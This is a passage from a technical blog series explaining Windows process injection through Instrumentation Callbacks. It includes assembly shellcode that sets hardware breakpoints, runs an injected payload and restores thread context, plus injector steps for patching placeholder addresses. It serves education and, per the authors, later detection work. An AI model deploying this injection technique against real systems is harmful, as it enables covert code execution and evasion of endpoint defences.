As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).
But why are we using 0x7fffffffffffffff as a call target? We aren’t; it is simply a placeholder. ASLR changes the memory address of, among other things, WinExec. This means WinExec’s address isn’t known at compile time. There are two solutions for this:
- We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
- We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.
In this case we use the second option to keep the shellcode small. Before the shellcode is injected into the other process, a search function replaces 0x7fffffffffffffff with the correct address of WinExec. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.
The payload can be anything, as long as it respects the following restrictions:
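The search-and-replace step can be sketched in a few lines of C++. This is a minimal sketch, not our actual injector code: the helper name patch_placeholder is hypothetical, and it assumes a little-endian host (true for x64), so the in-memory byte order of the integer matches the immediate encoded in the shellcode.

```cpp
#include <algorithm>
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: replaces every occurrence of an 8-byte placeholder in
// `code` with `value` and returns how many occurrences were replaced.
// Assumes a little-endian host, matching how x64 encodes a 64-bit immediate.
std::size_t patch_placeholder(std::vector<std::uint8_t>& code,
                              std::uint64_t placeholder,
                              std::uint64_t value) {
    std::array<std::uint8_t, sizeof(placeholder)> needle{};
    std::memcpy(needle.data(), &placeholder, needle.size());

    std::size_t patched = 0;
    auto it = code.begin();
    while ((it = std::search(it, code.end(), needle.begin(), needle.end())) != code.end()) {
        // A match guarantees at least 8 bytes remain, so this write stays in bounds.
        std::memcpy(&*it, &value, sizeof(value));
        it += static_cast<std::ptrdiff_t>(sizeof(value));
        ++patched;
    }
    return patched;
}
```

Returning the number of replacements lets the injector check that the placeholder was actually found. The value passed in would be the address resolved inside the injector itself, for example via GetProcAddress, which works because of the shared base addresses described above.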
- Needs to be position-independent
- Needs to properly restore the stack after execution or terminate its own thread
Payload wrapper
So, what does the payload wrapper need to include? Everything required to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, which in our example would make multiple calculators pop up. That means that if we don’t want to unregister our IC after execution, we need a flag that signals when the payload has already been executed. As the payload should execute once in the entire process and not once per thread, this flag needs to be process-wide. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉
Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.
The injected IC should execute the following rough pseudo-code logic:
    bool payload_executed = false
    bool thread_set_hardware_bp = false

    callback(void* ic_origin) {
        if (!payload_executed && !thread_set_hardware_bp) {
            thread_set_hardware_bp = true
            if (!set_hwbp(RtlExitUserThread)) // Does syscall
                thread_set_hardware_bp = false
            return
        }
        if (!is_exception(ic_origin))
            return
        if (exception_origin != RtlExitUserThread)
            return
        remove_hwbp(RtlExitUserThread) // Does syscall
        if (!payload_executed) {
            payload_executed = true
            execute_payload() // (Most likely) does syscall
        }
        restore_context()
    }
In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen when the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is set before the function call and cleared again if the breakpoint wasn’t set successfully.
This means that GetThreadContext and SetThreadContext, the two functions that issue a syscall down the line, trigger the IC again, but since the IC was not triggered by the expected exception, it simply returns.
A process-wide flag can be implemented by allocating memory with read and write permissions and using an address inside it as the flag. As we want to avoid any RWX memory allocations, which are highly suspicious, we need two memory regions with different permissions: RW- for the flag and R-X for the code itself. This causes another issue: the flag address can’t be known at compile time because the memory is allocated dynamically. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only know the flag address during the IC call that allocated it: the code region is not writable, so we would have nowhere to store the address.
Our solution for this is to use a placeholder address for the flag, just as with the WinExec address in the payload. The injector first allocates the memory for the flag, then searches for the placeholder inside the compiled wrapper (which was written to an array through prebuild steps), replaces it with the address of the allocated memory, and only then writes the wrapper to the victim process.
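To make the recursion argument easier to follow, the pseudo code can be modelled in plain C++. This is an illustrative simulation only: the Origin enum, the IcModel struct and its counters are hypothetical, and set_hwbp is a stand-in that simply re-enters the callback twice to mimic the syscalls issued by GetThreadContext and SetThreadContext.

```cpp
// Illustrative model only: all names here are hypothetical.
enum class Origin { Syscall, OtherException, ExitThreadBreakpoint };

struct IcModel {
    bool payload_executed = false;        // process-wide flag
    bool thread_set_hardware_bp = false;  // thread-local flag
    int bp_set_calls = 0;                 // how often set_hwbp ran
    int payload_runs = 0;                 // how often the payload ran
    int early_returns = 0;                // IC calls that were not our exception

    // Stand-in for set_hwbp: each of the two API calls issues a syscall,
    // and every syscall re-enters the callback.
    bool set_hwbp() {
        ++bp_set_calls;
        callback(Origin::Syscall);  // models GetThreadContext
        callback(Origin::Syscall);  // models SetThreadContext
        return true;
    }

    void callback(Origin origin) {
        if (!payload_executed && !thread_set_hardware_bp) {
            // Set the flag first so the re-entrant calls skip this branch.
            thread_set_hardware_bp = true;
            if (!set_hwbp())
                thread_set_hardware_bp = false;
            return;
        }
        if (origin != Origin::ExitThreadBreakpoint) {
            ++early_returns;
            return;
        }
        // remove_hwbp would run here; its syscalls take the early return above.
        if (!payload_executed) {
            payload_executed = true;
            ++payload_runs;
        }
        // restore_context would run here.
    }
};
```

In this model, the first IC call sets the breakpoint exactly once while the two nested calls return early, and two consecutive breakpoint hits run the payload only once.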
Setting a hardware breakpoint
As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.
In C-like pseudo code, the helper we need does roughly the following:
    bool set_dr(DWORD64 bp_address, bool enable) {
        CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
        if (!GetThreadContext(GetCurrentThread(), &context))
            return false;
        context.Dr3 = bp_address;
        // Clear the Dr3 enable, type and length bits
        context.Dr7 &= ~((3ULL << 28) | (3ULL << 30) | (1ULL << 6));
        if (enable)
            context.Dr7 |= 1ULL << 6;
        return SetThreadContext(GetCurrentThread(), &context);
    }
The same logic in assembly follows; we hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add support for all of them.
    ; rcx = breakpoint address
    ; rdx = Enable (1) / Disable (0)
    ; Return: rax != 0 = success
    ; RSP needs to be aligned
    set_dr:
        ; Save used registers
        push r14
        push r13
        push rdi
        push rbx

        mov r13, rcx
        mov rbx, rdx

        sub rsp, 0x4d8      ; Size of CONTEXT struct + 8 alignment
        mov rdi, rsp        ; CONTEXT base
        mov r14, rdi        ; rep stosq changes rdi, this is backup

        ; Zero CONTEXT struct
        mov rcx, 0x9a       ; (4d0 / 8) --> amount of uint64_t's
        xor rax, rax
        rep stosq

        ; CONTEXT_DEBUG_REGISTERS
        mov dword [r14 + 0x30], 0x00100010

        ; GetCurrentThread() == -2
        xor rcx, rcx
        dec rcx
        dec rcx

        ; The saved CONTEXT base
        mov rdx, r14

        ; Shadow space
        sub rsp, 0x20
        ; GetThreadContext placeholder
        mov rdi, 0x6CCCCCCCCCCCCCCC
        call rdi
        add rsp, 0x20       ; Shadow space

        ; if return value == 0 it errored
        test rax, rax
        jz _set_dr_ret

        ; Set Dr3
        mov qword [r14 + 0x60], r13

        ; offsetof(CONTEXT, Dr7) = 0x70
        mov rcx, [r14 + 0x70]

        ; Clear Dr3 specific bits: L3 (bit 6), R/W3 (bits 28-29), LEN3 (bits 30-31)
        ; The mask does not fit a sign-extended imm32, so it is loaded into rax first
        mov rax, ~((3 << 28) | (3 << 30) | (1 << 6))
        and rcx, rax

        test rbx, rbx
        jz _skip_enable_bp

        ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)
        or rcx, (1 << 6)

    _skip_enable_bp:
        ; Dr7 = new Dr7
        mov [r14 + 0x70], rcx

        ; SetThreadContext
        xor rcx, rcx
        dec rcx
        dec rcx
        mov rdx, r14

        ; Shadow space
        sub rsp, 0x20
        ; SetThreadContext placeholder
        mov rdi, 0x5CCCCCCCCCCCCCCC
        call rdi
        add rsp, 0x20       ; Shadow space

    _set_dr_ret:
        add rsp, 0x4d8      ; + 8 alignment
        pop rbx
        pop rdi
        pop r13
        pop r14
        ret
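If you want to support debug registers other than Dr3, the Dr7 bit positions can be computed from the register index instead of being hard-coded. The following is a minimal sketch that follows the architectural Dr7 layout (local enable bits at 0, 2, 4 and 6; a 2-bit type field and a 2-bit length field per register starting at bit 16). The function name dr7_for_execute_bp is hypothetical and not part of our wrapper.

```cpp
#include <cstdint>

// Hypothetical helper: returns `dr7` updated for debug register `index` (0..3).
// It clears the register's local-enable bit and its type (R/W) and length (LEN)
// fields, then sets the local-enable bit again if `enable` is true.
// Type 0 with length 0 describes a 1-byte execution breakpoint.
inline std::uint64_t dr7_for_execute_bp(std::uint64_t dr7, unsigned index, bool enable) {
    const std::uint64_t local_enable = 1ULL << (index * 2);       // L0..L3
    const std::uint64_t type_bits    = 3ULL << (16 + index * 4);  // R/W0..R/W3
    const std::uint64_t length_bits  = 3ULL << (18 + index * 4);  // LEN0..LEN3

    dr7 &= ~(local_enable | type_bits | length_bits);
    if (enable)
        dr7 |= local_enable;
    return dr7;
}
```

For index 3 this yields the local-enable bit 1 << 6 and the type and length fields in bits 28 to 31; bits belonging to the other debug registers are left untouched.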
Flag helper functions
For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which the injector replaces at runtime before writing the wrapper. For the thread-local one, we will again use the Thread Environment Block. There are less suspicious ways of doing this.
    load_bp_set_ptr_into_rcx:
        ; TEB
        mov rcx, [gs:0x30]
        ; TEB->InstrumentationCallbackDisabled
        add rcx, 0x1b8
        ret

    load_bitflag_into_rcx:
        ; rcx = pointer bit flag (placeholder currently)
        mov rcx, 0x2CCCCCCCCCCCCCCC
        ret
Execution logic
Looking back at the pseudo code, we have set_hwbp and remove_hwbp covered and can access the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. The stack isn’t guaranteed to be 16-byte aligned when the callback is entered (sometimes RSP % 0x10 = 8 instead of 0). To avoid issues, we manually align the stack so that all Windows API calls and also the payload call are made with a 16-byte aligned stack. So that the stack can be properly restored, we don’t simply overwrite RSP but instead push a marker value, which we check for when returning to see whether the stack was adjusted.
    entry:
        ; The actual return address of the IC
        push r10
        push r14
        mov r14, rsp
        add r14, 0x10
        push rax
        push rcx
        push rdx

        ; Rsp should be aligned for both cases, so it's done here
        mov rdx, rsp
        and dl, 0xF
        cmp dl, 0x8
        jne _skip_align
        mov rdx, 0xDEADBEEF
        push rdx

    _skip_align:
        call load_bp_set_ptr_into_rcx
        xor rax, rax
        ; Thread flag == 0 means the breakpoint has not been set in this thread yet
        cmp [rcx], rax
        je _hwbp_is_set

        ; "is_exception" check and payload execution

    _hwbp_is_set:
        ; […]

    _ret_unalign:
        ; Unalign rsp if it was previously modified
        cmp dword [rsp], 0xDEADBEEF
        jne _ret
        add rsp, 8

    _ret:
        pop rdx
        pop rcx
        xor rcx, rcx
        pop rax
        pop r14
        ; r10 still on top of stack -> return to it
        ret
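The marker trick can be illustrated with a tiny C++ model of a downward-growing stack. This is only a sketch for reasoning about the logic: StackModel and kAlignMarker are hypothetical names, and the model compares the whole 8-byte slot, whereas the assembly only compares the lower dword.

```cpp
#include <cstdint>
#include <vector>

constexpr std::uint64_t kAlignMarker = 0xDEADBEEF;

// Illustrative model of a downward-growing stack; `rsp` only tracks the address.
struct StackModel {
    std::uint64_t rsp;
    std::vector<std::uint64_t> slots;  // back() is the top of the stack

    void push(std::uint64_t value) {
        slots.push_back(value);
        rsp -= 8;
    }

    std::uint64_t pop() {
        const std::uint64_t value = slots.back();
        slots.pop_back();
        rsp += 8;
        return value;
    }

    // Mirrors the prologue check: push a marker only if RSP % 0x10 == 8.
    void align() {
        if ((rsp & 0xF) == 0x8)
            push(kAlignMarker);
    }

    // Mirrors _ret_unalign: drop the marker if it is on top of the stack.
    void unalign() {
        if (!slots.empty() && slots.back() == kAlignMarker)
            pop();
    }
};
```

If the stack was already aligned, align() and unalign() are both no-ops; otherwise exactly one extra slot is pushed and removed again. Note that the check relies on the value on top of the stack not being equal to the marker by coincidence.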
First execution
To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread. In the assembly this is the code at the _hwbp_is_set label, which, despite its name, is reached while the thread-local flag is still 0. Let’s look at the relevant excerpt from the pseudo code:
    […]
    if (!payload_executed && !thread_set_hardware_bp) {
        thread_set_hardware_bp = true
        if (!set_hwbp(RtlExitUserThread)) // Does syscall
            thread_set_hardware_bp = false
        return
    }
    […]
The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.
As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:
    _hwbp_is_set:
        call load_bitflag_into_rcx
        xor rax, rax
        inc rax
        ; Was payload already executed? If yes, don't set BP
        cmp [rcx], rax
        je _ret_unalign

        ; Set BP set flag to avoid recursion
        call load_bp_set_ptr_into_rcx
        xor rax, rax
        inc rax
        ; bp set flag = 1
        mov [rcx], rax

        ; RtlExitUserThread placeholder
        mov rcx, 0x3CCCCCCCCCCCCCCC
        xor rdx, rdx
        inc rdx
        ; Enable hwbp
        call set_dr

        ; Succeeded (rax != 0)? Then we are done
        test rax, rax
        jnz _ret_unalign

        ; Failed: bp set flag = 0 to retry on the next IC trigger
        call load_bp_set_ptr_into_rcx
        xor rax, rax
        mov [rcx], rax
        ; Fall through on purpose to return

    _ret_unalign:
        ; […]
After HWBP was set
Let’s look back at the pseudo code to see what is still missing. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:
    bool payload_executed = false
    bool thread_set_hardware_bp = false

    callback(void* ic_origin) {
        […]
        if (!is_exception(ic_origin))
            return
        if (exception_origin != RtlExitUserThread)
            return
        remove_hwbp(RtlExitUserThread) // Does syscall
        if (!payload_executed) {
            payload_executed = true
            execute_payload() // (Most likely) does syscall
        }
        restore_context()
    }
We already implemented most of the required logic in the second part of this series, just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not explain again how we know that we need to intercept KiUserExceptionDispatcher.
Alright, back to coding:
        ; […]
        ; Check if the hardware breakpoint was triggered
        ; KiUserExceptionDispatcher placeholder
        mov rcx, 0x4CCCCCCCCCCCCCCC
        cmp r10, rcx
        jne _ret_unalign

        ; r14 is still the top of the original stack
        ; this should be a CONTEXT*, if it is a nullptr it's bad :)
        test r14, r14
        jz _ret_unalign

        ; Exception thrown, but is it ours?
        ; RtlExitUserThread placeholder
        mov r10, 0x3CCCCCCCCCCCCCCC
        ; offsetof(CONTEXT, Rip) = 0xf8
        mov rcx, [r14+0xf8]
        cmp r10, rcx
        ; Not our exception
        jne _ret_unalign

        ; Unset bp
        xor rcx, rcx
        xor rdx, rdx
        call set_dr

        call load_bitflag_into_rcx

        ; Save context base
        push r14

        ; payload was already executed
        cmp qword [rcx], 1
        je _restore_context

        ; Set payload executed flag
        mov qword [rcx], 1

        sub rsp, 0x20
        call payload
        add rsp, 0x20
        ; as you can see, the payload needs to not mangle the stack
        ; otherwise it should call RtlExitUserThread itself
        ; if it mangled the stack rcx wouldn't be the context base in the next line

    _restore_context:
        ; Restore context base to rcx
        pop rcx

        ; Set ResumeFlag in EFlags register
        or dword [rcx+0x44], 0x10000

        ; ExceptionRecord = nullptr
        xor rdx, rdx

        ; Call RtlRestoreContext
        sub rsp, 0x20
        mov rdi, 0x8CCCCCCCCCCCCCCC
        call rdi
        ; RtlRestoreContext doesn't return
If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.
If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.
C++ code
If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.
Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.
Speaking of which, the blog post is already pretty long, so we’ve decided not to add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will find the placeholders 0x2CCCCCCCCCCCCCCC, 0x3CCCCCCCCCCCCCCC, 0x4CCCCCCCCCCCCCCC, 0x5CCCCCCCCCCCCCCC, 0x6CCCCCCCCCCCCCCC and 0x8CCCCCCCCCCCCCCC that need to be replaced; note that 0x3CCCCCCCCCCCCCCC occurs twice. The placeholders are commented with the function they require. The flag placeholder simply requires a small allocation with read and write permissions in the target process; since the wrapper reads and writes the flag as a qword, it needs to be at least 8 bytes.
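As a starting point, patching several placeholders and appending the payload could look roughly like the sketch below. It is not our actual code: the Patch struct and build_shellcode are hypothetical names, a little-endian host is assumed, and the addresses you pass in have to be resolved by your injector.

```cpp
#include <algorithm>
#include <cstdint>
#include <cstring>
#include <stdexcept>
#include <vector>

// Hypothetical description of one replacement.
struct Patch {
    std::uint64_t placeholder;  // 8-byte marker in the assembled wrapper
    std::uint64_t value;        // address resolved by the injector
};

// Hypothetical helper: replaces all occurrences of every placeholder in the
// wrapper, then appends the payload so that the wrapper's relative
// `call payload` lands on the first payload byte.
std::vector<std::uint8_t> build_shellcode(std::vector<std::uint8_t> wrapper,
                                          const std::vector<std::uint8_t>& payload,
                                          const std::vector<Patch>& patches) {
    for (const Patch& patch : patches) {
        std::uint8_t needle[8];
        std::memcpy(needle, &patch.placeholder, sizeof(needle));

        bool found = false;
        for (auto it = wrapper.begin();
             (it = std::search(it, wrapper.end(), needle, needle + 8)) != wrapper.end();
             it += 8) {
            std::memcpy(&*it, &patch.value, sizeof(patch.value));
            found = true;
        }
        if (!found)
            throw std::runtime_error("placeholder not found in wrapper");
    }

    wrapper.insert(wrapper.end(), payload.begin(), payload.end());
    return wrapper;
}
```

Throwing when a placeholder is missing is a design choice for this sketch: it catches a wrapper that was assembled from a different version of the source before anything is written to the victim process. The payload is appended unmodified, so its own placeholder would have to be patched beforehand.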
After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.
Closing words
In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To our knowledge, ICs are among the most powerful Windows features usable from user mode. In general, we only covered a fraction of what is possible with ICs; for example, we haven’t covered getting callbacks for APCs with them.
ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.
Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.